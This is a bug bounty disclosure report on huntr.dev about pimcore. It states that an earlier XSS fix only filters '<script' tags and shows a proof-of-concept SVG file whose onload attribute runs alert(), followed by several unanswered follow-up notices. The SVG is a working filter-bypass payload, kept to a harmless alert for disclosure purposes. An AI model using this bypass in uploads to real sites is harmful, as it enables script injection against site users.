Exposure of Sensitive Information to an Unauthorized Actor in pimcore/pimcore
Valid
Reported on
Jan 20th 2022
Description
XSS
Proof of Concept
Previous bug https://huntr.dev/bounties/96506857-06bc-4c84-88b7-4f397715bcf6/ is not properly fixed. it can be bypassed using with event handler . https://github.com/pimcore/pimcore/commit/35d1853baf64d6a1d90fd8803e52439da53a3911 its only checking <script tag which will be bypassed using onload event handler
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
We are processing your report and will contact the
pimcore
team within 24 hours.
5 months ago
We have contacted a member of the
pimcore
team and are waiting to hear back
5 months ago
We have sent a
follow up to the
pimcore
team.
We will try again in 7 days.
5 months ago
We have sent a
second
follow up to the
pimcore
team.
We will try again in 10 days.
5 months ago
We have sent a
third and final
follow up to the
pimcore
team.
This report is now considered stale.
5 months ago
to join this conversation